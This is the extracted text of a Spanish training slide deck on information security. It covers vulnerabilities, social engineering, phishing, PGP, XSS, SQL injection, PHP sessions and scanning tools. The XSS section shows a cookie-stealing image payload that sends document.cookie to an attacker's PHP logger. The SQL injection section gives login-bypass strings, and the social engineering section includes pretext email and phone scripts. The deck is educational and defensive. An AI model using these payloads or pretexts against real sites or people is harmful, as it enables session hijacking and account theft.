Está en la página 1de 114

Seguridad en la información

Seguridad de la información
1.

En nuestra empresa, vida diaria, que problemas de seguridad
apreciáis

2.

Estas preparado ante vulnerabilidades físicas

3.

Cada cuanto tiempo hacéis copias de seguridad y dónde las guardas

4.

Crees que eres vulnerable a la ingeniería social

5.

Empleas el email para enviar información confidencial

6.

En donde crees que debemos invertir más en seguridad

7.

De 0 a 10, que importancia le das a la información que manejas en la
empresa

8.

De 0 a 10, como consideras de seguras nuestras contraseñas

9.

Se puede hacer un sistema 100% seguro

Infraestructuras – hardware – software – personal

Seguridad de la información
p

Protección de la información y de los
sistemas de información contra
n

Acceso indebido

n

Uso, negligente o no

n

Divulgación

n

Interrupción

n

Destrucción no autorizada

Seguridad de la información p Conceptos básicos n Confidencialidad p p La información solo debe ser legible para personal autorizado Evita que exista una intercepción de esta y que pueda ser leída por una persona no autorizada .

Seguridad de la información p Conceptos básicos n Disponibilidad p n Irrefutabilidad p n Garantiza el acceso No se puede negar la autoría Autenticación p Solo individuos autorizados tienen acceso a los recursos .

Seguridad de la información p Conceptos básicos n Integridad p Garantizar que los datos sean los que se suponen que son y no se hayan alterados in situ o durante una transmisión .

Seguridad de la información Existe la seguridad absoluta??? .

Seguridad de la información p Todo es vulnerable si se aplica la fuerza justa p La aplica única razón por la cual utilizamos rejas en nuestras casas es porque hace que el ataque sea más lento .

Seguridad de la información p El costo de la seguridad aumenta exponencialmente a la necesidad de minimizar el riesgo p Un hacker puede gastar una ínfima parte en intentar vulnerar un sistema de lo que cuesta evitar el ataque p Las empresas asumen riesgos a fin de minimizar costes .

directrices y recomendaciones para establecer políticas de seguridad adecuadas .Seguridad de la información p Objetivo: p p Una máxima: p p Obtener un factor coste/riesgo asumible El sistema de seguridad no puede ser más valioso que el sistema o los datos que protege Existen documentos.

Seguridad de la información VULNERABILIDAD .

Seguridad de la información p Vulnerabilidad n Es la posibilidad de que una amenaza se materialice sobre un activo n Las amenazas pueden desencadenar incidentes en: p p p p p La organización Los procedimientos Equipos Software Información .

.Seguridad de la información p Analogía con el mundo real: p En el mundo informático el funcionamiento es muy similar p Existe un agujero de seguridad y mientras éste permanezca abierto estaremos predispuestos a sufrir un ataque.

Seguridad de la información p Ciclo de vida de una vulnerabilidad: n n Supongamos que se ha descubierto una vulnerabilidad Es de dominio público y aún no hay disponible ni solución ni parche .

Descubrimiento y publicación: p p Webs que ofrecen información diaria sobre las últimas vulnerabilidades y cuentan con extensas BD: National Vulnerability Database (EN) § http://nvd.gov/ p SecurityFocus (EN) § http://www.nist.com/vulnerabilities p Secunia (EN) § http://secunia.securityfocus.Seguridad de la información p Ciclo de vida de una vulnerabilidad: 1. Creación: p p 2. no intencionada en la creación o actualización de un producto error en el desarrollo o descuido en la configuración.com/advisories/historic/ .

etc. el cierre de puertos. la desactivación de servicios. Desarrollo de solución o parche: p se desarrolla una solución efectiva y permanente al agujero de seguridad. Explotación de la vulnerabilidad: p 4. se intenta desarrollar programas que automaticen el proceso. .Seguridad de la información p Ciclo de vida de una vulnerabilidad: 3. Entre las distintas posibilidades: p p Publicación por parte del fabricante de un parche o actualización del producto Métodos de prevención temporales o no oficiales como la publicación de un parche independiente del fabricante.

Seguridad de la información p Ciclo de vida de una vulnerabilidad: 5. Difusión de la actualización: p p Finaliza la existencia del defecto de seguridad Masivamente a través de mecanismos de actualización automática así como de una integración total con el producto afectado Nueva “actualización” posible nueva vulnerabilidad? .

siempre y cuando exista una vulnerabilidad que pueda aprovecharse .Seguridad de la información p Qué tipos de vulnerabilidades existen Los ataques se pueden producir en cada eslabón de esta cadena.

Apertura de la carcasa del equipo y robo del disco duro. Vulnerabilidad Natural: se refiere al grado en que el sistema puede verse afectado por desastres naturales o ambientales que pueden dañar el sistema: p p Fuego Inundaciones Rayos Fallos eléctricos Terremotos Picos de tensión . Apagado manual del equipo. Monitorización del tráfico de red.Seguridad de la información p Tipos de vulnerabilidades n Vulnerabilidad Física: el atacante tiene posibilidad de entrada o acceso físico a las instalaciones e incluso a los equipos: p p p p p n Interrupción del suministro eléctrico. Vandalismo.

Seguridad de la información p Tipos de vulnerabilidades n Vulnerabilidad del Hardware y del Software: ciertos tipos de dispositivos requieren la posesión de algún tipo de herramienta o tarjeta para poder acceder a los mismos p p n Bugs de los sistemas operativos Bugs en software en general Vulnerabilidad por emanación: los dispositivos eléctricos y electrónicos emiten radiaciones electromagnéticas .

: aplicación recién instalada con usuario por defecto Gestión de credenciales: tiene que ver con la gestión de usuarios. contraseñas y los ficheros que los almacenan Permisos. p p n n Se considera error cuando la configuración por defecto es insegura Ej. privilegios y/o control de acceso: ocurre cuando el acceso o asignación de permisos es defectuoso p Se trata del sistema y no del administrador .Seguridad de la información p Centrándonos en vulnerabilidades de Software: n De configuración: es una vulnerabilidad no del diseño del mismo sino del usuario.

Podrá desplazarse para ejecutar una utilidad de forma remota Seguimiento de enlaces p n se produce cuando la entrada que procesa un sistema no es comprobada adecuadamente cuando no existe una protección bastante robusta para evitar el acceso a un directorio desde un enlace simbólico o acceso directo Por puertas trampa/traseras p son entradas ocultas en un programa de software que permite el acceso .Seguridad de la información p Centrándonos en vulnerabilidades de Software: n Validación de entrada p n Salto de directorio p n es la falta de seguridad de un servicio de red para desplazarse por el árbol de directorios hasta la raíz del sistema.

Seguridad de la información
p

Centrándonos en vulnerabilidades de Software:
n

Por intrusiones: existen diversos tipos:
p
p

Análisis de puertos
Elevación de privilegios: consiste en enviar una solicitud
específica. En ciertos casos, esto genera comportamientos
atípicos.
§ desbordamiento de búfer: se desborda cuando de forma
incontrolada intenta meter más datos de los que caben. Son
defectos de programación y existen lenguajes que lo evitan
§ agotamiento del búfer: cuando un búfer usado para
comunicarse entre 2 dispositivos se alimenta con datos a una
velocidad mas baja de la que lee

p

Ataques malintencionados (virus, gusanos, troyanos).

Seguridad de la información
p

Centrándonos en vulnerabilidades de Software:
n

Secuencia de comandos en sitios cruzados (XSS):
abarca cualquier ataque que permite ejecutar código de
scripting (Ej.: javascript) en el contexto de otro dominio.
p
p

Aplicaciones HTML
Navegadores

El problema radica en incorrecta validación de los datos de
entrada: hay 2 tipos:
p
p

Indirecta: modifica valores que la aplicación web utiliza
para pasar variables entre paginas, sin sesiones (URL)
Directa: localiza puntos débiles en la programación de
filtros (Formularios)

Seguridad de la información
p

Centrándonos en vulnerabilidades de Software:
n

SQL Injection: está en el nivel de BD de una
aplicación.
p

p

n

Consiste en insertar un trozo de código SQL dentro de otro
con el fin de modificar su comportamiento.
Se realiza una consulta con parámetros dados por el
usuario y dentro de esos datos estaría el código malicioso

Por denegación de servicio: interrumpir el
funcionamiento normal de un servicio.
p

Las denegaciones de servicio se dividen:
§ Explotación de las debilidades del protocolo TCP/IP.
§ Explotación de las vulnerabilidades del software del servidor.

Seguridad de la información p Centrándonos en vulnerabilidades de Software: n Inyección de código: Existen distintos subtipos: p Inyección directa de código estático § Código en el contenido de las páginas § Permanente § Solución usar listas negras y listas blancas p Evaluación directa de código dinámico § § § § p Código en contenido dinámico No permanente Necesidad de crear funciones Solución usar listas negras y listas blancas Inclusión remota de archivos PHP § Uso de la función include() o require() que permite enlazar archivos en otros servidores § Si en el include/require incorporamos variables o funciones que puedan ser alteradas .

Seguridad de la información INGENIERÍA SOCIAL .

(Doc: Freedom downtown) n n “El factor determinante es interpretar correctamente las políticas de seguridad y hacerlas cumplir” Los ataques de ingeniería social (teléfono o email).Seguridad de la información p La mayor parte de los ataques exitosos son total o parcialmente debidos a Ingeniería Social p Kevin Mitnick “Condor” es considerado el primer hacker que la usó. son basados en cuatro principios básicos y comunes a las personas: p p p p Todos queremos ayudar Somos confiados No nos gusta decir No A todos nos gusta que nos alaben .

Seguridad de la información p Ingeniería social n Consiste en la manipulación de las personas para que voluntariamente realicen actos que normalmente no harían n Se convierte en el método de ataque más sencillo. menos peligroso para el atacante y por desgracia en uno de los más efectivos n Aprovecha el desconocimiento de unas mínimas medidas de seguridad .

¿Cómo configura sus firewalls? Nunca pude pensar en una buena contraseña.Seguridad de la información p Ingeniería social Ah. también gestiono una red. ¿Qué utiliza usted? .

Phishing Phisher se prepara para atacar Phisher utiliza la información para suplantar a víctima Phisher envía mail fraudulento a victimas Información confidencial es enviada al Phisher Víctima sigue indicaciones de phisher Víctima compromete información confidencial .Seguridad de la información p Ingeniería social .

asigne a su contraseña el valor 'PEPITO' (en mayúsculas). Hasta que reciba un nuevo aviso (aproximadamente en una semana).com> To: Usuario <user@sistema. Administrador . Para realizar una serie de pruebas orientadas a conseguir un optimo funcionamiento de nuestro sistema. por favor.Seguridad de la información p Ejemplos Ingeniería social n correo electrónico: From: Super-User <root@sistema.com> Subject: Cambio de clave Hola. Saludos. Rogamos disculpe las molestias. es necesario que cambie su clave mediante la orden 'passwd'.

Administrador: Un momento.xx. Muchas gracias. Administrador: De nada. en qué podemos ayudarle? Atacante: Hola. la nueva contraseña que acabo de asignarle es *****. no olvide cambiarla.Seguridad de la información p Ejemplos Ingeniería social n Llamada telefónica (el atacante sabe el nombre de cuenta): Administrador: Buenos días. soy José Luis Pérez. llamaba porque no consigo recordar mi password en la máquina sistema. Administrador: Muy bien. . Por favor. aquí área de sistemas. claro. un saludo. me puede decir su nombre de usuario? Atacante: Sí. Atacante: Por supuesto. es jlperez. ha sido muy amable. nada más conectar.es.

youtube.com/watch?v=cm89EQCF5e8&feature=re lated .youtube.com/watch?v=wiRuBZxMLss&feature=re lated (3 videos) n http://www.com/watch?v=NgHYI4AUUPc n http://www.Seguridad de la información p Ejemplos Ingeniería social n http://www.youtube.youtube.com/watch?v=Ao20tAS3x3I n http://www.

Seguridad de la información PHISHING .

3.Seguridad de la información p Como funciona 1. 2. p Correo electrónico masivo Correo electrónico phishing Sitio Web fraudulento Afecta principalmente n n n instituciones financieras proveedores internet grandes tiendas .

es n Asunto: Aviso Importante n n n n Logotipo oficial Aviso de Phishing Derechos reservados Teléfono de contacto .Seguridad de la información p Correo n Remitente: Banco Bilbao Vizcaya Argentaria info@bbva.

Seguridad de la información Reconocerías una web falsa? .

Seguridad de la información .

Seguridad de la información .

Seguridad de la información .

Seguridad de la información .

2.Seguridad de la información p Correo donde el INE hace un sondeo sobre satisfacción con los bancos 1. Damos la información Nos redirige a la web oficial .

hatmail.bankofthevvest.com www.faccebook.com http://www.Seguridad de la información p 40% error incluso entre usuarios “tecnológicamente avanzados” www.es/ .

com/ n n n n Facebook: http://faccebook.la/ PayPal: http://www.phishtank.php?phish_id=916948 .php?phish_id=916961 Bank of America: http://www.com/phish_detail.com/phish_detail.c.phishtank.com/phish_detail.php?phish_id=916955 Hotmail: http://www.phishtank.phishtank.Seguridad de la información p http://www.

p n Troyano que instala programa espía (en juegos y aplicaciones free) A través de ataque al navegador con vulnerabilidades p p Permite generar interfaces superpuestas sobre webs oficiales Muy difícil de detectar n Scam: ofertas de trabajo para blanquear dinero n Nuevas variantes: p p p Vishing: con tecnología VoIp (Identificador de llamada falsificable) Smishing: usan SMS Spear phishing: el correo va al jefe (CEO) § Correo personalizado § No usan correo masivo .Seguridad de la información p Otros tipos de phishing n Vía programa malicioso.

Seguridad de la información p Tendencias n A la profesionalización p p p p Ataques sofisticados y difíciles de detectar Difícil identificar interfaces falsas Simulación de URL Ataques sobre DNS n Siguen funcionando los ataque simples e ingeniería social de nivel bajo n Cada vez más las pequeñas empresas afectadas .

n No dé nunca información personal o financiera en respuesta a un e-mail n No utilice los enlaces incorporados en e-mails o páginas Web de terceros n Cuidado con los adjuntos (exe. xls…) n Educación y mucha cultura de seguridad . contraseña. pin. doc. etc. firma.Seguridad de la información p Prevención n Su usuario. son datos de carácter personal y estrictamente confidenciales n Desconfíe de cualquier toma de datos personales realizada a través de Internet fuera de su sitio web seguro.

Seguridad de la información COMO PROTEGERNOS .

) Estableciendo prioridades de los factores a proteger Creando políticas de seguridad Manteniendo la seguridad en el tiempo . 4. comunicaciones. 2. Determinando que queremos proteger (ej: Hardware. datos. sistemas. etc. 3.Seguridad de la información p ¿Cómo nos protegemos de la forma más eficiente posible? 1.

ya que es imposible. p Para eso debemos saber de qué o quiénes nos protegemos n cómo nos atacan. no en tratar de eliminar las amenazas. n .Seguridad de la información p Debemos n enfocarnos en reducir el riesgo.

Seguridad de la información p Pocos ataques tienen éxito sin una preparación previa: Infiltrado de programas. es necesario conocer la forma en que los atacantes actúan y cuáles son sus armas “El único sistema que está seguro es el que se encuentra debidamente apagado y dentro de una caja ignifuga” (Gene Spafford) . claves. etc. p Un sistema de seguridad es tan fuerte como su eslabón más débil p Para poder defender nuestros sistemas. recopilación de información sobre usuarios.

Seguridad de la información Ataques organizativos Hackers Ataques automatizados Datos restringidos DoS Infracciones accidentales de la seguridad Virus. caballos de Troya y gusanos Errores de conexión Denegación de servicio (DoS) .

Seguridad de la información p Estrategias n de seguridad Proactivas (proteger y proceder) Se basan en la prevención de ataques p Reducir al mínimo la cantidad de puntos vulnerables p Desarrollar planes de contingencia p n Reactivas (perseguir y procesar) Posterior al ataque p Evaluar ataque. documentar y aprender p . reparar e implementar plan de contingencia.

Seguridad de la información p Estrategias de seguridad Con respecto a la postura en recursos compartidos n Lo que no se permite está expresamente prohibido p n El sistema está perfectamente delimitado Lo que no se prohíbe está permitido p Menos restrictiva y favorecida por la imposibilidad de políticas de restricción a medida para todos los posibles casos .

socio de negocios. procedimientos y conciencia Encriptación Seguridad de programas y servicios Fortalecer el sistema operativo. autenticación Marketing. dispositivos de seguimiento Documentos de seguridad.Seguridad de la información p Estrategias de seguridad Datos Aplicación Host Red interna Perímetro Seguridad física Políticas. Firewall Protecciones. seguros. oficina sucursal. encriptar datos de red Oficina principal. Finanzas. educación del usuario . Ventas.

Seguridad de la información p Debemos formar al usuario: Cultura de seguridad Formatos potencialmente peligrosos No abrir archivos no solicitados No utilizar fuentes no confiables Navegación segura Política de passwords Copias de seguridad .

Seguridad de la información FIRMA Y CIFRADO DE CORREO .

Para enviar correos cifrados Sólo la conoce el emisor Permite firmar y descifrar correo Para enviar correos firmados no se puede averiguar una a través de la otra. .Seguridad de la información p Cifrar: Alterar el contenido para que sólo los destinatarios puedan entenderlo p Firmar: permite al destinatario comprobar que el mensaje no fue modificado en el camino y que lo que lee es exactamente lo que se envió p Como lo hacemos p Clave pública: § § § p Clave privada: § § § p La conocen sólo los destinatarios Permite a la gente verificar nuestra firma y crear mensajes cifrados para nosotros.

Seguridad de la información p Ejemplo de firma .

Seguridad de la información p Ejemplo de cifrado .

www.org/ ftp://ftp.net/(mac) p p Necesitamos un cliente de correo n n p Instalamos PGP Thunderbird http://es-es.sourceforge.org/es-ES/thunderbird/addon/71 Instalamos: ThunderbirdàHerramientasàComplementos Genera nueva opción de menú OpenPGP .Seguridad de la información p Cifrado con PGP (GNU Privacy Guard) n n n n Aplicación de cifrado asimétrico libre http://www.0.mozillamessaging.org/gcrypt/binary/ (windows) http://macgpg.gnupg.mozilla.gnupg.com/esES/thunderbird/ Necesitamos un software de cifrado y autenticación n n n n Enigmail 1.1 https://addons.

rediris.Seguridad de la información p Generar las claves n OpenPGP à Administración de claves n En el administrador de claves p p p Configuración de las claves n p Generar à Nuevo par de claves Generar certificado de revocación En la configuración de la cuenta : activar soporte OpenPGP Subir claves públicas a n http://www.es/cert/servicios/keyserver/ .

org/s/install Incompatible con FireFTP Reiniciar si es necesario Acceder a Gmail y firmar y cifrar a través de iconos .getfiregpg.Seguridad de la información p Encriptar con GMAIL n Configurar el navegador “Conexión del navegador” para usar siempre https n Instalamos PGP n Usaremos Mozilla Firefox n Instalamos el complemento para Firefox p p p p n FireGPG http://es.

Seguridad de la información AMENAZAS EN LA RED .

quede inutilizable o no disponible n Interceptación: Consiste en acceder a un determinado objeto del sistema n Modificación: Además de la interceptación. el objeto del ataque es modificado n Fabricación: Modificación destinada a suplantar el objeto real .Seguridad de la información p Existen 4 tipos de amenazas en la red: n Interrupción: Hace que el objetivo del ataque se pierda.

Seguridad de la información .

etc. . Lammers. Script-Kiddies Motivaciones: p p p Ranking.Seguridad de la información p Ataques n n n n Premeditación Descuido Ignorancia Indiferencia de las políticas de seguridad p Ataques n n Internos externos Hackers. reto personal Robo de datos Pruebas (pen test). Crackers.

Además de conocimientos técnicos. usan tácticas como la Ingeniería Social y el Basureo. n Personal de la organización: Cualquier empleado puede ser una amenaza.Seguridad de la información p Origen de las amenazas n Personas: Piratas que buscan nivel de privilegios en un sistema. el borrado de huellas puede causar daños . pero cuando lo hacen de forma intencionada son extremadamente dañinos n Ex-empleados: Pueden tener motivos para Atacar n Curiosos: Aunque se trata de ataques no destructivos. Pueden causar daños no intencionados.

Seguridad de la información .

prueban las tecnologías y aprenden con el objetivo de hacerlas mas eficientes y fiables n De sombrero negro (piratas) p Propósito siempre malicioso .Seguridad de la información p Hackers (expertos) n De sombrero blanco p Ayudan a mejorar los sistemas y tecnologías informáticas p Responsables de los protocolos informáticos y herramientas p Optimizan sistemas.

Seguridad de la información p De sombrero negro (piratas) n Script Kiddies (crashers. packet monkeys) p Jóvenes usuarios que usan programas encontrados en la red par dañar sistemas p Sin conocimientos y altamente incompetentes p n Lamer. Phreakers p Usan la red telefónica para hacer llamadas gratis . o que intenta pavonearse de sus hazañas y conocimientos. lamers. Se utiliza con tono despectivo para describir a un hacker que no sigue las reglas de la comunidad.

Seguridad de la información p De sombrero negro (piratas) n Caders: atacan sistemas de tarjetas (generalmente bancarias) para entender su funcionamiento y aprovechar sus vulnerabilidades n Crackers: crean software para atacar sistemas informáticos o eliminar la protección anticopia del software con licencia n Hacktivistas: Hackers con motivaciones ideologías .

Seguridad de la información EN LA WEB .

Shoulder Surfing. (Ej: para la competencia) Virus. Gusanos Espionaje: Trashing. Spyware.Seguridad de la información p Servidores n y platatormas web Ataques internos p Suplantación de identidad Sniffing (Incluso administradores pueden hacer sniffing. Troyanos. etc Keylogging . Sugerencia: CIFRAR) Robo de información.Keycatching p KeyCatcher p p p p p .

Seguridad de la información p Trashing (basureo) n Alfombrilla ratónà .

url mal escritas.Seguridad de la información p Servidores n y platatormas web Ataques externos p Ataques contra servicios WEB § Cross Site Scripting (XSS) § SQL Injection § Exploits: aprovecha una vulnerabilidad de SO. webs simuladas Troyanos: software malicioso bajo una apariencia inofensiva . Sw y Hw p p p p p p Robo de Identidad Denegación de Servicio (DoS) SPAM VIRUS Phishing: ingeniería social.

Seguridad de la información

CROSS SITE SCRIPTING

XSS

Seguridad de la información
p

Servidores y platatormas web
n

Cross Site Scripting (XSS)
p

p

p

p
p
p

Aprovecha la falta de mecanismos de filtrado en los
campos de entrada
Permiten insertar y enviar datos sin validación alguna,
aceptando el envió de scripts completos
Pueden generar secuencias de comandos maliciosas que
impacten directamente en el sitio o en el equipo de un
usuario
Sentencias ocultas en el código: en enlaces, formularios…
Se usa el correo electrónico para enviarlos
Se usan blogs, foros, libros de visitas…

Seguridad de la información
p

Ejemplos Cross Site Scripting (XSS)
Supongamos que un sitio web tiene la siguiente forma:
http://www.example.com/home.asp?frame=menu.asp
En este ejemplo, ¿qué pasaría si se pone como URL del
frame un código javascript?
javascript:while(1)alert("Este mensaje saldrá
indefinidamente");

txt alojado en el servidor del atacante . "a").com/foto."> Código de foto.php? galleta='%20+document.php.txt". fput($file.jpg name="foto“ onload="foto. "$migalleta\n"). $file=fopen("cookies. <? $migalleta = $_REQUEST[galleta].src='http://www. ?> La variable que contiene las cookies galleta del usuario será almacenada en un documento de texto llamado cookies.com/mifoto.cookie.mipagina.mipagina.Seguridad de la información p Ejemplos Cross Site Scripting (XSS) Un atacante aprovecha la vulnerabilidad de nuestro sitio y publica una imagen de la siguiente manera: http://www. fclose($file).

cuentas bancarias … p n Encriptar todas las cookies de nuestro sitio Usar SSL (Secure Socket Layer) p No es 100% seguro contra XSS pero ayuda .Seguridad de la información p Defensa Cross Site Scripting (XSS) n Url p p n En formularios: p p n Evitar llamadas a servidores externos Evitar parámetros susceptibles (sql. datos privados…) Limitar la longitud de los campos de entrada MaxLength Validar los campos (expresiones regulares) Cookies p Evitar almacenar datos susceptibles § Nombre usuario y contraseña § Tarjetas.

Seguridad de la información SQL INJECTION .

form("pass") sql="SELECT * FROM usuarios WHERE user='" & usuario & "' and password='" & pass & "'“ %> p n El usuario teclea en el formulario usuario:" a' or true ‘" contraseña: " a' or true ‘“ La cadena resultado sería SELECT * FROM users WHERE user='a' or true and pass='a' or true n Otro ejemplo SELECT * FROM users WHERE user = ‘root' AND password='' OR ''='‘ -- .form("usuario") pass=request. <% usuario=request.Seguridad de la información p SQL Injection n Filtrado incorrecto de las variables utilizadas en las partes del programa con código SQL.

Seguridad de la información p SQL Injection n Mas peligroso p n Se pueden concatenar sentencias de modificación. insertado y borrado de datos o de tablas Solución: p p p p No usar usuario root para acceso a las BBDD Validar el contenido y longitud de los campos Usar procedimientos almacenados Evitar es que. . al formar la cadena SQL. ésta tenga un "sentido" distinto al esperado = Eliminar comillas $query_result = mysql_query("SELECT * FROM usuarios WHERE nombre = \"" . "\""). mysql_real_escape_string($nombre_usuario) .

Seguridad de la información AUTENTIFICACIÓN .

php) Se crea la sesión y se da acceso al usuario o se deniega el mismo .Seguridad de la información p Autentificación de usuarios en la web n Se emplean sesiones p n Son variables globales que nos permiten almacenar datos que necesiten volver a ser usados en otros accesos a la pagina Pasos p p p Se crea el formulario de validación (login.php) Se comprueba la validez del usuario (autenticacion.

Seguridad de la información .

php header("Location: login.php?errorusuario=si").php) <?php //vemos si el usuario y contraseña son válidos if ($_POST["usuario"]=="usuario" && $_POST["contrasena"]=="123"){ //usuario y contraseña válidos session_start(). } ?> . $_SESSION["autenticado"]= "SI". header ("Location: aplicacion.Seguridad de la información p Sesiones (autenticacion. }else { //si no existe se va a login.php"). // seguridad almacenando sesion_id() $_SESSION[“id_misesion"]= session_id().

php) <?php //Inicio la sesión session_start().php"). va a la página de autenticacion header("Location: login. //salimos de este script exit(). //COMPRUEBA QUE EL USUARIO ESTA AUTENTICADO if ($_SESSION["autenticado"] != "SI") { //si no existe. } ?> n Este código lo incluimos en todas las páginas que requieran validación .Seguridad de la información p Sesiones (seguridad.

Seguridad de la información HERRAMIENTAS .

usuarios y grupos..Seguridad de la información p GFI LANguard : n Escanea redes e informa de: p p p El nivel de service pack de cada máquina. puertos abiertos.com/lannetscan . falta de parches de seguridad. datos del registro. Escanea los resultados y los guarda en documentos HTML.gfi. recursos compartidos. passwords débiles. dispositivos USB .. sobre los que se puede consultar la información Existe una versión gratuita que está disponible para su prueba y uso no comercial durante 30 días http://www. puntos de acceso wireless. servicios/ aplicaciones activas en el equipo.

com/Products/Retina.Seguridad de la información p eEye retina: n Su función es explorar todas las maquinas de una red e informar sobre cualquier vulnerabilidad encontrada n Esta muy distribuida en el mercado. es sencilla y rápida para el escaneo de vulnerabilidades http://www.aspx .eeye.

Seguridad de la información p Nikto: n n n n n n Nikto es un escáner de servidores Web Open source (GPL) Busca más de 2000 archivos/CGIs potencialmente peligrosos y problemas en más de 200 servidores.net/?article=216 (cómo instalar en windows) .cirt. Es una buena herramienta pero limitada por su uso de Whisker/ libwhisker.net/nikto2 http://www. evitando los sistemas de detección de intrusos. debido a la falta de actualizaciones de esta última. Viene con una documentación muy completa.madirish. la cual es recomendable revisar antes de ejecutar el programa. por lo que las vulnerabilidades más críticas no son detectadas http://www. Tiene la capacidad de no sólo probar vulnerabilidades de CGI sino también que lo hace de forma evasiva.

net/projects/owasp/files/WebScarab/ .Seguridad de la información p WebScarab n Herramienta que permite analizar aplicaciones que se comunican usando protocolos de comunicación Web como el HTTP y el HTTPS n Almacena los resultados de sus escaneos n Diseñada para permitir a un desarrollador de aplicaciones basadas en HTTP(S) a depurar los errores de implementación y permitir identificar vulnerabilidades en el sistema http://sourceforge.

internautas.Seguridad de la información p Asociación de internautas n Scanner on-line n Realiza un escaneo en remoto de los ‘puertos bien conocidos’ del sistema objeto del estudio n Permite seleccionar los puertos que quieres analizar (hasta un máximo de 5 puertos) n Devuelve como resultado únicamente el estado (abierto.org/w-scanonline.php . cerrado) en el que se encuentran los puertos seleccionados previamente http://www.

http://online.com/?url=1 . Web n Ofrece una herramienta On-line para el análisis en línea de direcciones de Internet en busca de código malicioso que pudiera estar inyectado en las páginas HTML. n En el caso de ser así.drweb.Seguridad de la información p Dr. ya que podría dañar la configuración del sistema. por lo que sería aconsejable no acceder a dicha URL. nos avisará que el acceso a este sitio podría ser peligroso.us.

explabs. explotan alguna vulnerabilidad o se utilizan con otros fines fraudulentos. http://linkscanner.aspx . para determinar si las páginas mostradas en la búsqueda realizada contienen virus. MSN y Yahoo. software espía.com/linkscanner/default.Seguridad de la información p LinkScanner n Analiza URLs en línea o bajo demanda o si prefiere instalarla como herramienta de escritorio n Realiza un análisis de los resultados de búsquedas Web con motores de Google.

Seguridad de la información p Virus Total n Servicio de análisis de archivos sospechosos que permite detectar virus. Quick Heal. y malware en general n Trabaja con los principales motores de antivirus y antimalware: Avast!. gusanos.com/ . NOD 32.virustotal. Ikarus. Norton Antivirus n http://www. AVG. Avira. Panda Platinum. Antivir. BitDefender. Clamwin. troyanos.

Seguridad de la información p Nessus n Es la herramienta de evaluación de vulnerabilidades para UNIX de mayor renombre n Nessus quizás sea el mejor escáner de vulnerabilidades "Open Source" (GPL) que hay disponible en la red n Se actualiza constantemente. aunque de coste gratuito a menos que desees los plugins más recientes http://www. con más de plugins gratuitos n Nessus 3 ahora es de código cerrado.000 .org 11.nessus.

generación de informes y presentación de datos Consta de 4 ficheros básicos: p p p p Las librerías del programa Las librerías NASL (Nessus Attack Scripting Language) El núcleo de la aplicación Los plugins (gestionan los diferentes tipos de ataques) .Seguridad de la información p Nessus n n n n Basado en un modelo cliente/servidor que cuenta con su propio protocolo de comunicación El servidor explora y prueba ataques contra objetivos establecidos El cliente realiza las tareas de control.

Seguridad de la información p Nessus .

WinSniffer. Hunt. ApSniffer .org/tools/tools-es.html packet sniffers para Ethernet/LAN : p Wireshark (anteriormente conocido como Ethereal ). Network Stumbler .Seguridad de la información n Las 75 Herramientas de Seguridad Más Usadas p n http://insecure. WinDump. Darkstat. p p Ettercap. KSniffer) Redes inalámbricas: Kismet. traffic-vis. TCPDump.

Seguridad de la información NORMAS A SEGUIR .

sistemas operativos y aplicaciones actualizadas a la última versión conocida estable n Utilizar mecanismos de criptografía para almacenar y transmitir datos sensibles n Cambiar las claves cada cierto tiempo .Seguridad de la información p Normas de defensa n Respetar las políticas de seguridad n Antivirus + Firewall n Siempre tener nuestros servicios.

n No dejar información sensible en directorios web n No usar las mismas claves para servicios distintos p Muy común: la clave de root sea la misma que la de MySQL y la misma que Apache .Seguridad de la información p Normas de defensa n Asignar un responsable de seguridad n Auto-auditar nuestros propios servicios n Autoatacarnos para saber si somos o no vulnerables n Estar siempre alerta. Es muy común: ”a nosotros nadie nos ataca”. ...

Seguridad de la información p Normas de defensa n Cambiar los puertos por defecto en servicios no públicos n Aplicar técnicas de Hardening n Para servicios privados y confidenciales utilizar túneles seguros (VPN cifradas) en Internet y redes no seguras n Habilitar módulos de seguridad (Ej mod_security en Apache) .

Seguridad de la información p Normas de defensa n Nunca trabajar con ”root” si no es estrictamente necesario n Cerrar puertos y eliminar aplicaciones innecesarias n Proteger las URL (ej: mod_rewrite. o AJAX) .

mezclando mayúsculas.Seguridad de la información p Normas de defensa n Elegir contraseñas seguras. minúsculas. n Las claves no deben ser palabras coherentes ni de diccionario n 10 contraseñas mas usadas en la red de 32 millones p 123456-12345-123456789-password-iloveyou-princessrockyou-1234567-12345678-abc123 . números y caracteres especiales.

Seguridad de la información .

3% llegan a los límites del WTFismo con simples si. QWERTY 5% eran nombres de celebridades tipo hanna.badhim. 4% corresponden a palabras como password o password1.info/: almacena p http://passworg. matrix o ironman. whatever. 123456. 14% usa combinaciones excesivamente fáciles de recordar como 1234.com/: genera y valida p .Seguridad de la información p Normas de defensa n Datos: p p p p p 16% usa su primer nombre como contraseña. no. n Contraseña segura simple: s+6o1e$7 n Herramientas: http://keepass.

es un proceso.” Bruce Schneier .Seguridad de la información “Seguridad no es un producto.

ar/ http://foro.kriptopolis.elhacker.org http://www.rompecadenas.org/ .portalhacker.net/ http://www.com.Seguridad de la información http://www.

Seguridad de la información .